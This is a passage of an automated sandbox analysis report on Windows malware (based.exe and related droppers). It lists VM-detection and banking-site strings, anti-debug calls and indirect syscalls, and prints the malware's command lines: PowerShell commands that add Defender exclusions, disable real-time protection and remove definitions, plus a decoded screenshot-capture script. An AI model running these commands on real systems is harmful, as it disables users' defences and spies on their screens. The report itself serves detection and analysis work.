Source: based.exe, 00000008.00000003.2272898356.000001F16D030000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2797041633.000001F16D3F7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2270864329.000001F16D3F7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2274201190.000001F16E2DC000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2267634345.000001F16E2D5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2777793095.000001F16D030000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: s.exe, 0000000C.00000002.2098412372.0000000004CA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: s.exe, 0000000C.00000002.2098412372.0000000004CA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\_`}
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe

API call chain: ExitProcess graph end node

graph_5-24484

Source: C:\ProgramData\main.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe

Code function: 0_2_00007FF72B8DD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF72B8DD12C

Source: C:\ProgramData\Microsoft\based.exe

Code function: 8_2_00007FF8A87A6180 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

8_2_00007FF8A87A6180

Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe

Code function: 5_2_0044A640 mov eax, dword ptr fs:[00000030h]

5_2_0044A640

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe

Code function: 0_2_00007FF72B8F3480 GetProcessHeap,

0_2_00007FF72B8F3480

Source: C:\ProgramData\main.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Logs\SettingSync\cmd.exe	Process token adjusted: Debug
Source: C:\Windows\Logs\SettingSync\cmd.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8DD30C SetUnhandledExceptionFilter,	0_2_00007FF72B8DD30C
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8DD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF72B8DD12C
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8DC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF72B8DC8A0
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8EA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF72B8EA614
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8DD30C SetUnhandledExceptionFilter,	2_2_00007FF72B8DD30C
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8DD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF72B8DD12C
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8DC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FF72B8DC8A0
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8EA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF72B8EA614
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF8BA250468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FF8BA250468
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_0044215D SetUnhandledExceptionFilter,	5_2_0044215D
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_004412D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_004412D7
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_0044647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_0044647F
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00441FCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00441FCA
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF64479BDE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FF64479BDE0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF64479C67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00007FF64479C67C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF64479C860 SetUnhandledExceptionFilter,	6_2_00007FF64479C860
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447AACD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00007FF6447AACD8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_0000020694EF7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_0000020694EF7D90
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_0000020694EFD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_0000020694EFD2A4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF69369D30C SetUnhandledExceptionFilter,	7_2_00007FF69369D30C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF69369C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FF69369C8A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF69369D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF69369D12C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936AA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF6936AA614
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E7AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001F16E7AD2A4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E7A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001F16E7A7D90
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF69369D30C SetUnhandledExceptionFilter,	8_2_00007FF69369D30C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF69369C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF69369C8A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF69369D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF69369D12C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936AA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF6936AA614
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8073058 IsProcessorFeaturePresent,00007FF8BA2419C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8BA2419C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF8A8073058

Source: C:\ProgramData\main.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\ProgramData\main.exe	NtEnumerateKey: Indirect: 0x25A8D292842
Source: C:\Windows\Logs\SettingSync\cmd.exe	NtDeviceIoControlFile: Indirect: 0x33B2B9D
Source: C:\Windows\Logs\SettingSync\cmd.exe	NtEnumerateValueKey: Indirect: 0x33B293D
Source: C:\Windows\Logs\SettingSync\cmd.exe	NtDeviceIoControlFile: Indirect: 0x1B5F2B9D
Source: C:\Windows\Logs\SettingSync\cmd.exe	NtEnumerateValueKey: Indirect: 0x1B5F293D
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtEnumerateKey: Indirect: 0x1CCA2842
Source: C:\ProgramData\main.exe	NtResumeThread: Indirect: 0x25A8D29231E
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtDeviceIoControlFile: Indirect: 0x1CCA2B9D
Source: C:\ProgramData\main.exe	NtQuerySystemInformation: Indirect: 0x25A8D292F57
Source: C:\Windows\Logs\SettingSync\cmd.exe	NtQuerySystemInformation: Indirect: 0x33B205D
Source: C:\Windows\Logs\SettingSync\cmd.exe	NtEnumerateKey: Indirect: 0x1B5F2875
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtEnumerateValueKey: Indirect: 0x1CCA293D
Source: C:\Windows\Logs\SettingSync\cmd.exe	NtEnumerateKey: Indirect: 0x33B2875
Source: C:\Windows\Logs\SettingSync\cmd.exe	NtQuerySystemInformation: Indirect: 0x1B5F205D
Source: C:\ProgramData\main.exe	NtDeviceIoControlFile: Indirect: 0x25A8D292B9D
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtResumeThread: Indirect: 0x1CCA231E
Source: C:\ProgramData\main.exe	NtEnumerateValueKey: Indirect: 0x25A8D29293D
Source: C:\ProgramData\main.exe	NtQueryDirectoryFile: Indirect: 0x25A8D2923AE
Source: C:\Windows\Logs\SettingSync\cmd.exe	NtEnumerateValueKey: Indirect: 0x33B290E
Source: C:\ProgramData\main.exe	NtEnumerateKey: Indirect: 0x25A8D292875
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtQuerySystemInformation: Indirect: 0x1CCA205D
Source: C:\ProgramData\main.exe	NtQuerySystemInformation: Indirect: 0x25A8D29205D
Source: C:\Windows\Logs\SettingSync\cmd.exe	NtEnumerateValueKey: Indirect: 0x1B5F290E
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtQueryDirectoryFile: Indirect: 0x1CCA23AE
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtEnumerateKey: Indirect: 0x1CCA2875
Source: C:\ProgramData\setup.exe	NtQuerySystemInformation: Direct from: 0x7FF71BDC42AE
Source: C:\Windows\Logs\SettingSync\cmd.exe	NtEnumerateKey: Indirect: 0x1B5F2842
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	NtEnumerateValueKey: Indirect: 0x1CCA290E
Source: C:\Windows\Logs\SettingSync\cmd.exe	NtEnumerateKey: Indirect: 0x33B2842
Source: C:\ProgramData\main.exe	NtEnumerateValueKey: Indirect: 0x25A8D29290E

Maps a DLL or memory area into another process

Source: C:\ProgramData\setup.exe

Section loaded: NULL target: unknown protection: readonly

Modifies Windows Defender protection settings

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
